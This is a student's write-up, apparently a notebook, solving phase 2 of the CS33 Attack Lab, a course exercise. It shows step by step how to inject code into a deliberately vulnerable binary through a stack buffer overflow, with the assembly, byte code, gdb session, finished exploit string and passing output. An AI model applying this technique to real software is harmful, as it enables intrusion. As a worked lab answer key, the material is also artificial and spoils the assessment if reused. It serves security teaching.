# CS33: Attack Lab

## Phase 2

### Overview

The key technique of exploitation in phase 2 is code injection, which can be carried out in two steps. First, we will write the binary code instructions into the runtime stack. Then, by overflowing the runtime stack, we overwrite the the return address of the current stack and change it into the starting address of the injected code. This way, when the current procedure call is finished, the program will restart at the overwritten return address, which is the injected code.

In this phase, what we want to achieve with the injection code is to call another procedure named `touch2` with cache as the argument. So, in the injected code, we need to first move the desired argument value for `touch2` into `%rdi%`, the register that by convention holds the first argument for procedure call, and then find some way to call the procedure `touch2`. Because the lab requirement forbids us from using `jmp` or `call` in our injected code, we need to use a combination of stack overflow and `ret` to call `touch2`. 

First, we will place the address of `touch2` in the exploit string. Then, in the injected code, we will manipulate the stack pointer to have it pointing to the injected address of `touch2`. This way, when we call `ret` in the injected code, the stack will pop the address of `touch2` and have the program restart there. as desired.

### Execution

Similar to phase 1, because the stack frame is of size `0x28` or `40`, we need to supply 40-byte long exploit string to overflow the stack and then rewrite the return address with another 8 bytes. However, this time, we also need to include the injected code in the first 40 bytes, so we cannot just simply pad them with 0.

To get started, we will write down the assembly code we want to inject. The objective of this phase is to call procedure `touch2` with argument `cookie`, whose value is specified in the file `cookie.txt`.

In [1]:
cat cookie.txt

0x55ca9f6d


In [2]:
pygmentize phase2.s

movl  $0x55ca9f6d, %edi
sub   $0x10, %rsp
ret


Remark that here we need to subtract the stack pointer by two bytes, `0x10`, to have it point to the 8 byte immediately preceding the return address of the `getbuf` call. Why? Because when the computer is running through our injected code, it has already returned from `getbuf` call, thereby incrementing the stack by `0x8` above the return address of `getbuf`.

Then, we need to convert it into byte code. One way to do it is to first assemble it into object code and then use objdump to get the byte code.

In [3]:
gcc -c phase2.s -o phase2.o

In [4]:
objdump -d phase2.o > phase2.d

In [5]:
ccat phase2.d


phase2.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	bf 6d 9f ca 55 	movl	$1439342445, %edi
       5:	48 83 ec 10 	subq	$16, %rsp
       9:	c3 	retq


So the byte representation of the injected code will be:

```
bf 6d 9f ca 55 48 83 ec 10 c3
```

Based on the design outlined in the Overview, we will pad the exploit string with 00 until the last 16 bytes; the first 8 bytes will be the address of `touch2` and the second 8 will be the address of the injected code, which is simply the address of the buffer. So, the exploit string will be:

```
bf 6d 9f ca 55 48 83 ec 10 c3 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 ADDRESS_OF_TOUCH2 ADDRESS_OF_BUFFER
```

We can find the address of `touch2` by simply examining the disassembled object code, `ctarget.s`.

In [6]:
cat ctarget.s | grep -A 1 touch2

touch2:
  401889:	48 83 ec 08 	subq	$8, %rsp
--
  40189f:	74 23 	je	35 <touch2+0x3B>
  4018a1:	bf 00 31 40 00 	movl	$4206848, %edi
--
  4018dd:	eb db 	jmp	-37 <touch2+0x31>



The line immediately after `touch2:` declaration is the address of the procedure. Padded to 8 bytes, the address is `0x0000000000401889`. However, we still need to format the address to fit the Little Endian byte order and separate each byte with a space. I wrote a convenient Python script `toLittleEndian.py` to carry out the task.

In [7]:
pygmentize toLittleEndian.py

import sys

word = sys.argv[1]
result = '';
for i in range(0, len(word), 2):
  result = word[i : i + 2] + ' ' + result
print(result.strip())


In [8]:
python3 toLittleEndian.py 0000000000401889

89 18 40 00 00 00 00 00


Therefore, `ADDRESS_OF_TOUCH2` is `89 18 40 00 00 00 00 00`.

The only thing remains is to find the address of the buffer, which cannot be found by just looking into the disassembled code because it is allocated at run time. So, we are going to run the code in `gdb` to find it out. Below is the result of running gdb in the school's designated lab server:

```
(gdb) break getbuf
Breakpoint 1 at 0x401847: file buf.c, line 12.
(gdb) run
Starting program: /w/home.13/class/classtzh/CS33/AttackLab/target40/ctarget
Cookie: 0x55ca9f6d

Breakpoint 1, getbuf () at buf.c:12
12	buf.c: No such file or directory.
(gdb) disassemble
Dump of assembler code for function getbuf:
=> 0x0000000000401847 <+0>:	sub    $0x28,%rsp
   0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
End of assembler dump.
(gdb) stepi
14	in buf.c
(gdb) disassemble
Dump of assembler code for function getbuf:
   0x0000000000401847 <+0>:	sub    $0x28,%rsp
=> 0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
End of assembler dump.
(gdb) print /x $rsp
$1 = 0x556647a8
```

We can see that the address of the buffer is `0x556647a8`, which, padded to 8 byte, is `0x00000000556647a8`. Convert it again to Little Endian with our Python script.

In [9]:
python3 toLittleEndian.py 00000000556647a8

a8 47 66 55 00 00 00 00


Therefore, ADDRESS_OF_BUFFER is a8 47 66 55 00 00 00 00.

Since we now have all the puzzle pieces, we can complete the exploit string, which is:

```
bf 6d 9f ca 55 48 83 ec 10 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 89 18 40 00 00 00 00 00 a8 47 66 55 00 00 00 00
```

We then tested it on the server. It worked.

```
# ./hex2raw < phase2.txt | ./ctarget
Cookie: 0x55ca9f6d
Type string:Touch2!: You called touch2(0x55ca9f6d)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
```

## Phase 3